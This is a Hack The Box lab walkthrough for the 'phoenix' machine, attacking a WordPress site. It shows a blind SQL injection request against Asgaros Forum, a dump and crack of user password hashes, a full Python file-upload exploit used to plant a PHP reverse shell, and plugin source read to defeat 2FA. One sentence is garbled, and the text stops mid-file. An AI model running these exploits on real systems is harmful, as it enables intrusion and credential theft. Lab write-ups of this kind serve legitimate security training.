Hack-The-Box-walkthrough[phoenix]

Posted on 2022-03-24 Edited on 2022-06-25 In HackTheBox walkthrough Views: Word count in article: 6.1k Reading time ≈ 22 mins.

introduce

OS: Linux
Difficulty: Hard
Points: 40
Release: 05 Mar 2022
IP: 10.10.11.149

Enumeration

NMAP

┌──(root💀kali)-[~/hackthebox/machine/phoenix]
└─# nmap -sV -v -p- --min-rate=10000 10.10.11.149
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http     Apache httpd
443/tcp open  ssl/http Apache httpd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We have a couple http ports, let’s start with them:

We’re given the domain phoenix.htb so we add it to /etc/hosts. We can register and login to an account:

After singing in, we’re taken to a wordpress panel:

We see pie register however no luck with exploiting it. We can bruteforce directories and find there’s a WAF too:

We also have a site administrator that we find over at /forum:

Looking further into this /forum directory, we find it’s ran by Asgaros Forum, the current install is vulnerable to SQLi:d find cron.sh.xLooking further into this /forum directory, we find it’s ran by Asgaros Forum, the current install is vulnerable to SQLi:

wpscan --url https://phoenix.htb/ --disable-tls-checks –enumerate u

Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php

Sitemap: https://phoenix.htb/wp-sitemap.xml

[+] robots.txt found: https://phoenix.htb/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] WordPress version 5.9 identified (Insecure, released on 2022-01-25).
 | Found By: Rss Generator (Passive Detection)
 |  - https://phoenix.htb/feed/, <generator>https://wordpress.org/?v=5.9</generator>
 |  - https://phoenix.htb/comments/feed/, <generator>https://wordpress.org/?v=5.9</generator>

[+] WordPress theme in use: coming-soon-event
 | Location: https://phoenix.htb/wp-content/themes/coming-soon-event/
 | Latest Version: 1.0.8 (up to date)
 | Last Updated: 2021-08-24T00:00:00.000Z
 | Readme: https://phoenix.htb/wp-content/themes/coming-soon-event/readme.txt
 | Style URL: https://phoenix.htb/wp-content/themes/coming-soon-event/style.css?ver=1.0.0
 | Style Name: Coming Soon Event
 | Description: The Coming Soon Event under construction theme will play a big role in boosting up the business and ...
 | Author: blogwp
 |
 | Found By: Css Style In Homepage (Passive Detection)
 | Confirmed By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 1.0.8 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - https://phoenix.htb/wp-content/themes/coming-soon-event/style.css?ver=1.0.0, Match: 'Version: 1.0.8'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] accordion-slider-gallery
 | Location: https://phoenix.htb/wp-content/plugins/accordion-slider-gallery/
 | Latest Version: 2.2
 | Last Updated: 2022-02-23T06:48:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | The version could not be determined.

[+] asgaros-forum
 | Location: https://phoenix.htb/wp-content/plugins/asgaros-forum/
 | Last Updated: 2022-01-30T12:54:00.000Z
 | [!] The version is out of date, the latest version is 2.0.0
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | Version: 1.15.12 (10% confidence)
 | Found By: Query Parameter (Passive Detection)
 |  - https://phoenix.htb/wp-content/plugins/asgaros-forum/skin/widgets.css?ver=1.15.12

[+] photo-gallery-builder
 | Location: https://phoenix.htb/wp-content/plugins/photo-gallery-builder/
 | Latest Version: 2.3
 | Last Updated: 2022-02-23T07:02:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | The version could not be determined.

[+] pie-register
 | Location: https://phoenix.htb/wp-content/plugins/pie-register/
 | Latest Version: 3.7.4.2
 | Last Updated: 2022-02-14T05:16:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | The version could not be determined.

[+] timeline-event-history
 | Location: https://phoenix.htb/wp-content/plugins/timeline-event-history/
 | Latest Version: 2.2
 | Last Updated: 2022-02-23T06:58:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | The version could not be determined.

Asgaros Forum < 2.0.0 - Subscriber+ Blind SQL Injection

we first need to get the _wpnonce value:

1	https://phoenix.htb/wp-admin/admin-ajax.php?action=rest-nonce

so we can build the payload request like below:

POST /?rest_route=/asgaros-forum/v1/reaction/1/hello HTTP/2
Host: phoenix.htb
Cookie: asgarosforum_unread_cleared=1000-01-01%2000%3A00%3A00; asgarosforum_unread_exclude=a%3A1%3A%7Bi%3A1%3Bi%3A1%3B%7D; wp-settings-time-8=1648102004; PHPSESSID=9fjjtktvasvk7ttiae2lag57bj; wordpress_logged_in_3185d858877bd1933266ec420c541bfc=luci%7C1649311604%7CDS4X13KhVrhypqTbdEQOOGSwBAYP3Sra5ZwFwAC7FCE%7C7e49b65fe7fd8b77bbeb4209856d4ac458907af59e10ff0015ab926f72d210bd; wp-settings-8=mfold%3Df
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://phoenix.htb/forum/forum/first-forum/
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Content-Length: 88


post_id=1 UNION SELECT 1, 1, 1, 1, 1,2,3,4,5,sleep(2) FROM dual -- g&_wpnonce=3354d7889a

confirmed this is a time based sql injection

Foothold

We confirm this works via manual injection. I’ll use SQLMAP to further this:

1	sqlmap --url https://phoenix.htb/forum/?subscribe_topic=1 --level 3 --risk 3 --batch

Database: wordpress
[40 tables]
+-------------------------------------+
| wp_commentmeta                      |
| wp_comments                         |
| wp_forum_ads                        |
| wp_forum_forums                     |
| wp_forum_polls                      |
| wp_forum_polls_options              |
| wp_forum_polls_votes                |
| wp_forum_posts                      |
| wp_forum_reactions                  |
| wp_forum_reports                    |
| wp_forum_topics                     |
| wp_links                            |
| wp_mo2f_network_blocked_ips         |
| wp_mo2f_network_email_sent_audit    |
| wp_mo2f_network_transactions        |
| wp_mo2f_network_whitelisted_ips     |
| wp_mo2f_user_details                |
| wp_mo2f_user_login_info             |
| wp_options                          |
| wp_pieregister_code                 |
| wp_pieregister_custom_user_roles    |
| wp_pieregister_invite_code_emails   |
| wp_pieregister_lockdowns            |
| wp_pieregister_redirect_settings    |
| wp_postmeta                         |
| wp_posts                            |
| wp_term_relationships               |
| wp_term_taxonomy                    |
| wp_termmeta                         |
| wp_terms                            |
| wp_usermeta                         |
| wp_users                            |
| wp_wpns_attack_logs                 |
| wp_wpns_backup_report               |
| wp_wpns_files_scan                  |
| wp_wpns_ip_rate_details             |
| wp_wpns_malware_hash_file           |
| wp_wpns_malware_scan_report         |
| wp_wpns_malware_scan_report_details |
| wp_wpns_malware_skip_files          |
+-------------------------------------+

The immediately useful ones are wp_user that we can dump:

+----+------------+------------------------------------+---------------+------------------------+---------------------+---------------------+-----------------------------------------------+-------------+--------------+
| ID | user_login | user_pass                          | user_nicename | user_email             | user_url            | user_registered     | user_activation_key                           | user_status | display_name |
+----+------------+------------------------------------+---------------+------------------------+---------------------+---------------------+-----------------------------------------------+-------------+--------------+
|  1 | Phoenix    | $P$BA5zlC0IhOiJKMTK.nWBgUB4Lxh/gc. | phoenix       | phoenix@phoenix.htb    | https://phoenix.htb | 2021-11-10 15:04:57 |                                               |           0 | Phoenix      |
|  3 | john       | $P$B8eBH6QfVODeb/gYCSJRvm9MyRv7xz. | john          | john@domain.htb        |                     | 2021-11-12 13:18:52 | 1637475452:$P$Byf8G.iNgy4e7VvrqKEAA7G/eQ9KtZ. |           0 | john         |
|  5 | Jsmith     | $P$BV5kUPHrZfVDDWSkvbt/Fw3Oeozb.G. | jsmith        | john.smith@phoenix.htb |                     | 2021-11-21 06:09:43 |                                               |           0 | John Smith   |
|  6 | Jane       | $P$BJCq26vxPmaQtAthFcnyNv1322qxD91 | jane          | jane@phoenix.htb       |                     | 2021-11-21 06:10:43 | 1637475043:$P$BMJkE2fGOJndBWkaqjsnK1OYpNn2aA. |           0 | Jane Logan   |
|  7 | Jack       | $P$BzalVhBkVN.6ii8y/nbv3CTLbC0E9e. | jack          | jack@phoenix.htb       |                     | 2021-11-21 06:11:27 | 1637475087:$P$B3xIrY8QcD0jSicmD4B/iOltw1jplE/ |           0 | Jack Thomson |
+----+------------+------------------------------------+---------------+------------------------+---------------------+---------------------+-----------------------------------------------+-------------+--------------+

This didn’t get me as far as I’d like. We can crack pheonix’s password to phoenixthefirebird14 using john and rockyou.txt. We can try the file upload exploit:

┌──(root💀kali)-[~/hackthebox/machine/phoenix]
└─# john hash --wordlist=/usr/share/wordlists/rockyou.txt                                                        
Using default input encoding: UTF-8
Loaded 5 password hashes with 5 different salts (phpass [phpass ($P$ or $H$) 512/512 AVX512BW 16x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:08 1.04% (ETA: 11:01:01) 0g/s 21956p/s 109782c/s 109782C/s 840924..211126
phoenixthefirebird14 (?)     
superphoenix     (?)     
password@1234    (?)     
3g 0:00:06:25 DONE (2022-03-23 10:54) 0.007786g/s 37224p/s 99497c/s 99497C/s !!!@@@!!!..*7¡Vamos!
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed.

Exploit Title: Wordpress Plugin Download From Files 1.48 - Arbitrary File Upload

This is pretty easy to use however we run into an SSL cert issue:

We need to change up the request to ignore SSL verification (on both requests):

# Exploit Title: Wordpress Plugin Download From Files 1.48 - Arbitrary File Upload
# Google Dork: inurl:/wp-content/plugins/download-from-files
# Date: 10/09/2021
# Exploit Author: spacehen
# Vendor Homepage: https://wordpress.org/plugins/download-from-files/
# Version: <= 1.48
# Tested on: Ubuntu 20.04.1 LTS (x86)

import os.path
from os import path
import json
import requests
import sys

def print_banner():
	print("Download From Files <= 1.48 - Arbitrary File Upload")
	print("Author -> spacehen (www.github.com/spacehen)")

def print_usage():
	print("Usage: python3 exploit.py [target url] [php file]")
	print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)")

def vuln_check(uri):
	response = requests.get(uri, verify=False)
	raw = response.text

	if ("Sikeres" in raw):
		return True;
	else:
		return False;

def main():

	print_banner()
	if(len(sys.argv) != 3):
		print_usage();
		sys.exit(1);

	base = sys.argv[1]
	file_path = sys.argv[2]

	ajax_action = 'download_from_files_617_fileupload'
	admin = '/wp-admin/admin-ajax.php';

	uri = base + admin + '?action=' + ajax_action ;
	check = vuln_check(uri);

	if(check == False):
		print("(*) Target not vulnerable!");
		sys.exit(1)

	if( path.isfile(file_path) == False):
		print("(*) Invalid file!")
		sys.exit(1)

	files = {'files[]' : open(file_path)}
	data = {
	"allowExt" : "php4,phtml",
	"filesName" : "files",
    "maxSize" : "1000",
    "uploadDir" : "."
	}
	print("Uploading Shell...");
	response = requests.post(uri, files=files, data=data, verify=False)
	file_name = path.basename(file_path)
	if("ok" in response.text):
		print("Shell Uploaded!")
		if(base[-1] != '/'):
			base += '/'
		print(base + "wp-admin/" + file_name);
	else:
		print("Shell Upload Failed")
		sys.exit(1)

main()

We can retry using a php reverse shell, Make sure this is saved with a .phtml exploit:

php-reverse-shell.php

┌──(root💀kali)-[~/hackthebox/machine/phoenix]
└─# python3 exploit.py https://phoenix.htb/ ./shell.phtml
Download From Files <= 1.48 - Arbitrary File Upload
Author -> spacehen (www.github.com/spacehen)
/usr/local/lib/python3.9/dist-packages/urllib3/connectionpool.py:1013: InsecureRequestWarning: Unverified HTTPS request is being made to host 'phoenix.htb'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings
  warnings.warn(
Uploading Shell...
/usr/local/lib/python3.9/dist-packages/urllib3/connectionpool.py:1013: InsecureRequestWarning: Unverified HTTPS request is being made to host 'phoenix.htb'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings
  warnings.warn(
Shell Uploaded!
https://phoenix.htb/wp-admin/shell.phtml

┌──(root💀kali)-[~/hackthebox/machine/phoenix]
└─# nc -lvp 1234
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.11.149.
Ncat: Connection from 10.10.11.149:34844.
Linux phoenix 5.4.0-96-generic #109-Ubuntu SMP Wed Jan 12 16:49:16 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
 06:28:24 up 18:25,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1001(wp_user) gid=1001(wp_user) groups=1001(wp_user)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
wp_user@phoenix:/$ ^Z
[1]+  Stopped                 nc -lvp 1234

┌──(root💀kali)-[~/hackthebox/machine/phoenix]
└─# stty raw -echo

┌──(root💀kali)-[~/hackthebox/machine/phoenix]
nc -lvp 1234
            reset
reset: unknown terminal type unknown
Terminal type? screen
wp_user@phoenix:/$ id
uid=1001(wp_user) gid=1001(wp_user) groups=1001(wp_user)
wp_user@phoenix:/$ whoami
wp_user

GET OPT KEY

we find there is a 2FA auth in /wp-admin login page, we try to figure it out how to bypass it, or just get the OTP key:

and we found encrypt and decrypt functions from the source of that miniorange plugin at handler/twofa/two_fa_utility.php

wp_user@phoenix:~/wordpress$ cat /opt/wordpress/wp-content/plugins/miniorange-2-factor-authentication/handler/twofa/two_fa_utility.php
<?php
/** miniOrange enables user to log in through mobile authentication as an additional layer of security over password.
 * Copyright (C) 2015  miniOrange
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <http://www.gnu.org/licenses/>
 * @package        miniOrange OAuth
 * @license        http://www.gnu.org/copyleft/gpl.html GNU/GPL, see LICENSE.php
 */

/**
 * This library is miniOrange Authentication Service.
 * Contains Request Calls to Customer service.
 **/
class MO2f_Utility {

        public static function get_hidden_phone( $phone ) {
                $hidden_phone = 'xxxxxxx' . substr( $phone, strlen( $phone ) - 3 );
                return $hidden_phone;
        }

        public static function mo2f_check_empty_or_null( $value ) {
                if ( ! isset( $value ) || $value == '' ) {
                        return true;
                }
                return false;
        }

        public static function is_curl_installed() {
                if ( in_array( 'curl', get_loaded_extensions() ) ) {
                        return 1;
                } else {
                        return 0;
                }
        }

        public static function get_all_plugins_installed() {
                $all_plugins = get_plugins();
                $plugins = array();
                $form = "";
                $plugins["None"] = "None";
                foreach ($all_plugins as $plugin_name=>$plugin_details){
                        $plugins[$plugin_name] = $plugin_details["Name"];
                }
                unset($plugins['miniorange-2-factor-authentication/miniorange_2_factor_settings.php']);
                $form .= '<div style="padding:5px;margin-left:4%;font-size:13px;background-color: #a3e8c2">Please select the plugin<br>
                        <select name="plugin_selected">';
                foreach($plugins as $identifier=>$name) {
                        $form .= '<option value="' . $identifier . '">' .  $name . '</option>' ;
                }
                $form .= '</select></div>';
                return $form;
        }

        public static function mo2f_check_number_length( $token ) {
                if ( is_numeric( $token ) ) {
                        if ( strlen( $token ) >= 4 && strlen( $token ) <= 8 ) {
                                return true;
                        } else {
                                return false;
                        }
                } else {
                        return false;
                }
        }

        public static function mo2f_get_hidden_email( $email ) {
                if ( ! isset( $email ) || trim( $email ) === '' ) {
                        return "";
                }
                $emailsize    = strlen( $email );
                $partialemail = substr( $email, 0, 1 );
                $temp         = strrpos( $email, "@" );
                $endemail     = substr( $email, $temp - 1, $emailsize );
                for ( $i = 1; $i < $temp; $i ++ ) {
                        $partialemail = $partialemail . 'x';
                }
                $hiddenemail = $partialemail . $endemail;
                return $hiddenemail;
        }

        public static function check_if_email_is_already_registered( $email ) {
                global $Mo2fdbQueries;
                $users = get_users( array() );
                foreach ( $users as $user ) {
                        $user_email = $Mo2fdbQueries->get_user_detail( 'mo2f_user_email', $user->ID );
                        if ( $user_email == $email ) {
                                return true;
                        }
                }

                return false;
        }

        public static function check_if_request_is_from_mobile_device( $useragent ) {
                if ( preg_match( '/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i', $useragent ) || preg_match( '/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i', substr( $useragent, 0, 4 ) ) ) {
                        return true;
                } else {
                        return false;
                }
        }


        public static function set_user_values(  $user_session_id, $variable, $value){
                global $Mo2fdbQueries;
                $key = get_option( 'mo2f_encryption_key' );
                $data_option=NULL;

                if(empty($data_option)){

                        //setting session
                        $_SESSION[$variable] = $value;

                        // setting cookie values
                        if(is_array($value)){
                                if($variable == 'mo_2_factor_kba_questions'){
                                        MO2f_Utility::mo2f_set_cookie_values( 'kba_question1', $value[0]['question']);
                                        MO2f_Utility::mo2f_set_cookie_values( 'kba_question2', $value[1]['question'] );
                                }else if($variable == 'mo2f_rba_status'){
                                        MO2f_Utility::mo2f_set_cookie_values( 'mo2f_rba_status_status', $value["status"] );
                                        MO2f_Utility::mo2f_set_cookie_values( 'mo2f_rba_status_sessionUuid', $value["sessionUuid"] );
                                        MO2f_Utility::mo2f_set_cookie_values( 'mo2f_rba_status_decision_flag', $value["decision_flag"] );
                                }
                        }else{
                                MO2f_Utility::mo2f_set_cookie_values( $variable, $value);
                        }

                        // setting values in database
                        $user_session_id = MO2f_Utility::decrypt_data( $user_session_id, $key );
                        if ( is_array( $value ) ) {
                                $string_value = serialize( $value );
                                $Mo2fdbQueries->save_user_login_details( $user_session_id, array( $variable => $string_value ) );
                        } else {
                                $Mo2fdbQueries->save_user_login_details( $user_session_id, array( $variable => $value ) );
                        }
                } else if (!empty($data_option) && $data_option=="sessions"){

                        $_SESSION[$variable] = $value;

                }else if (!empty($data_option) && $data_option=="cookies"){

                        if(is_array($value)){
                                if($variable == 'mo_2_factor_kba_questions'){
                                        MO2f_Utility::mo2f_set_cookie_values( 'kba_question1', $value[0] );
                                        MO2f_Utility::mo2f_set_cookie_values( 'kba_question2', $value[1] );
                                }else if($variable == 'mo2f_rba_status'){
                                        MO2f_Utility::mo2f_set_cookie_values( 'mo2f_rba_status_status', $value["status"] );
                                        MO2f_Utility::mo2f_set_cookie_values( 'mo2f_rba_status_sessionUuid', $value["sessionUuid"] );
                                        MO2f_Utility::mo2f_set_cookie_values( 'mo2f_rba_status_decision_flag', $value["decision_flag"] );
                                }
                        }else{
                                MO2f_Utility::mo2f_set_cookie_values( $variable, $value);
                        }
                } else if (!empty($data_option) && $data_option=="tables"){
                        $user_session_id = MO2f_Utility::decrypt_data( $user_session_id, $key );
                        if ( is_array( $value ) ) {
                                $string_value = serialize( $value );
                                $Mo2fdbQueries->save_user_login_details( $user_session_id, array( $variable => $string_value ) );
                        } else {
                                $Mo2fdbQueries->save_user_login_details( $user_session_id, array( $variable => $value ) );
                        }
                }
        }
        public static function get_client_ipaddress(){

                $ip = null;
                if (!empty($_SERVER['HTTP_CLIENT_IP'])) {

                        $ip = $_SERVER['HTTP_CLIENT_IP'];

                } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {

                        $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];

                } else {
                        $ip = $_SERVER['REMOTE_ADDR'];
                }
                return $ip;
        }
        /*

        Returns Random string with length provided in parameter.

        */

        /**
         * @param string $data - crypt response from Sagepay
         *
         * @return string
         */
        public static function decrypt_data( $data, $key ) {
                $c = base64_decode($data);
                $ivlen = openssl_cipher_iv_length($cipher="AES-128-CBC");
                $iv = substr($c, 0, $ivlen);
                $hmac = substr($c, $ivlen, $sha2len=32);
                $ciphertext_raw = substr($c, $ivlen+$sha2len);
                $original_plaintext = openssl_decrypt($ciphertext_raw, $cipher, $key, $options=OPENSSL_RAW_DATA, $iv);
                $calcmac = hash_hmac('sha256', $ciphertext_raw, $key, $as_binary=true);
                $decrypted_text = '';
                if(is_string($hmac) and is_string($calcmac))
                {
                        if (hash_equals($hmac, $calcmac))//PHP 5.6+ timing attack safe comparison
                        {
                                $decrypted_text=$original_plaintext;
                        }
                }

                return $decrypted_text;
        }

        public static function random_str( $length, $keyspace = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ' ) {
                $randomString     = '';
                $charactersLength = strlen( $keyspace );
                $keyspace         = $keyspace . microtime( true );
                $keyspace         = str_shuffle( $keyspace );
                for ( $i = 0; $i < $length; $i ++ ) {
                        $randomString .= $keyspace[ rand( 0, $charactersLength - 1 ) ];
                }

                return $randomString;

        }

        public static function mo2f_set_transient( $session_id, $key, $value, $expiration = 300 ) {
                set_transient($session_id.$key, $value, $expiration);
                $transient_array = get_site_option($session_id);
                $transient_array[$key] = $value;
                update_site_option($session_id, $transient_array);
                MO2f_Utility::mo2f_set_session_value($session_id, $transient_array);
                if(is_array($value))
                $value = json_encode($value) ;
            
                MO2f_Utility::mo2f_set_cookie_values(base64_encode($session_id),$value);
            
  }
        public static function mo2f_get_transient( $session_id, $key) {
                   MO2f_Utility::mo2f_start_session();

        if(isset($_SESSION[$session_id])){
                $transient_array = $_SESSION[$session_id];
                $transient_value = isset($transient_array[$key]) ? $transient_array[$key] : null;
                return $transient_value;
        }else if(isset($_COOKIE[base64_decode($session_id)])){
                $transient_value = MO2f_Utility::mo2f_get_cookie_values(base64_decode($session_id));
                return $transient_value;
        }else{
                $transient_value = get_transient($session_id.$key);
                if(!$transient_value){
                                $transient_array = get_site_option($session_id);
                                $transient_value = isset($transient_array[$key]) ? $transient_array[$key] : null;
                        }
                return $transient_value;
        }


        }
    public static function mo2f_set_session_value($session_id, $transient_array){
                 MO2f_Utility::mo2f_start_session();
                    $_SESSION[ $session_id ] = $transient_array ;
    }

    public static function mo2f_start_session() {
                if ( ! session_id() || session_id() == '' || ! isset( $_SESSION ) ) {
                        $session_path = ini_get('session.save_path');
                        if( is_writable($session_path) && is_readable($session_path) && !headers_sent() ) {
                           if(session_status() != PHP_SESSION_DISABLED )
                                   session_start();
                        }
                }
        }
        /**
         * The function returns the session variables, and if not, retrieves the cookie values set in case the right permissions are not aassigned for the sessions folder in the server.
         *
         * @param string $variable - the session or cookie variable name
         * @param string $session_id - the session id of the user
         *
         * @return string
         */
        public static function mo2f_retrieve_user_temp_values( $variable, $session_id = null ) {
                global $Mo2fdbQueries;
                $data_option=NULL;
                if(empty($data_option)){
                        if ( isset( $_SESSION[ $variable ] ) && ! empty( $_SESSION[ $variable ] ) ) {
                                //update_option('mo2f_data_storage',"sessions");
                                return $_SESSION[ $variable ];
                        } else {
                                $key        = get_option( 'mo2f_encryption_key' );
                                $cookie_value = false;
                                if ( $variable == 'mo2f_rba_status' ) {
                                        if ( isset( $_COOKIE['mo2f_rba_status_status'] ) && ! empty( $_COOKIE['mo2f_rba_status_status'] ) ) {
                                                $mo2f_rba_status_status        = MO2f_Utility::mo2f_get_cookie_values( 'mo2f_rba_status_status' );
                                                $mo2f_rba_status_sessionUuid   = MO2f_Utility::mo2f_get_cookie_values( 'mo2f_rba_status_sessionUuid' );
                                                $mo2f_rba_status_decision_flag = MO2f_Utility::mo2f_get_cookie_values( 'mo2f_rba_status_decision_flag' );
                                                $cookie_value = array(
                                                        "status"        => $mo2f_rba_status_status,
                                                        "sessionUuid"   => $mo2f_rba_status_sessionUuid,
                                                        "decision_flag" => $mo2f_rba_status_decision_flag
                                                );
                                        }
                                } else if ( $variable == 'mo_2_factor_kba_questions' ) {
                                        if ( isset( $_COOKIE['kba_question1'] ) && ! empty( $_COOKIE['kba_question1'] ) ) {

                                                $kba_question1['question'] = MO2f_Utility::mo2f_get_cookie_values( 'kba_question1' );
                                                $kba_question2['question'] = MO2f_Utility::mo2f_get_cookie_values( 'kba_question2' );
                                                $cookie_value = array( $kba_question1, $kba_question2 );
                                        }
                                } else {
                                        $cookie_value = MO2f_Utility::mo2f_get_cookie_values( $variable );
                                }
                                if($cookie_value){
                                        return $cookie_value;
                                } else {
                                        $session_id = MO2f_Utility::decrypt_data( $session_id, $key );
                                        $db_value = $Mo2fdbQueries->get_user_login_details( $variable, $session_id );
                                        if ( in_array( $variable, array( "mo2f_rba_status", "mo_2_factor_kba_questions" ) ) ) {
                                                $db_value = unserialize( $db_value );
                                        }
                                        return $db_value;
                                }
                        }
                }else if (!empty($data_option) && $data_option=="sessions"){
                        if ( isset( $_SESSION[ $variable ] ) && ! empty( $_SESSION[ $variable ] ) ) {
                                return $_SESSION[ $variable ];
                        }
                }else if (!empty($data_option) && $data_option=="cookies"){
                        $key        = get_option( 'mo2f_encryption_key' );
                        $cookie_value = false;

                        if ( $variable == 'mo2f_rba_status' ) {
                                if ( isset( $_COOKIE['mo2f_rba_status_status'] ) && ! empty( $_COOKIE['mo2f_rba_status_status'] ) ) {
                                        $mo2f_rba_status_status        = MO2f_Utility::mo2f_get_cookie_values( 'mo2f_rba_status_status' );
                                        $mo2f_rba_status_sessionUuid   = MO2f_Utility::mo2f_get_cookie_values( 'mo2f_rba_status_sessionUuid' );
                                        $mo2f_rba_status_decision_flag = MO2f_Utility::mo2f_get_cookie_values( 'mo2f_rba_status_decision_flag' );

                                        $cookie_value = array(
                                                "status"        => $mo2f_rba_status_status,
                                                "sessionUuid"   => $mo2f_rba_status_sessionUuid,
                                                "decision_flag" => $mo2f_rba_status_decision_flag
                                        );
                                }

                        } else if ( $variable == 'mo_2_factor_kba_questions' ) {

                                if ( isset( $_COOKIE['kba_question1'] ) && ! empty( $_COOKIE['kba_question1'] ) ) {
                                        $kba_question1 = MO2f_Utility::mo2f_get_cookie_values( 'kba_question1' );
                                        $kba_question2 = MO2f_Utility::mo2f_get_cookie_values( 'kba_question2' );


                                        $cookie_value = array( $kba_question1, $kba_question2 );
                                }

                        } else {
                                $cookie_value = MO2f_Utility::mo2f_get_cookie_values( $variable );
                        }

                        if($cookie_value){
                                return $cookie_value;
                        }
                }else if (!empty($data_option) && $data_option=="tables"){
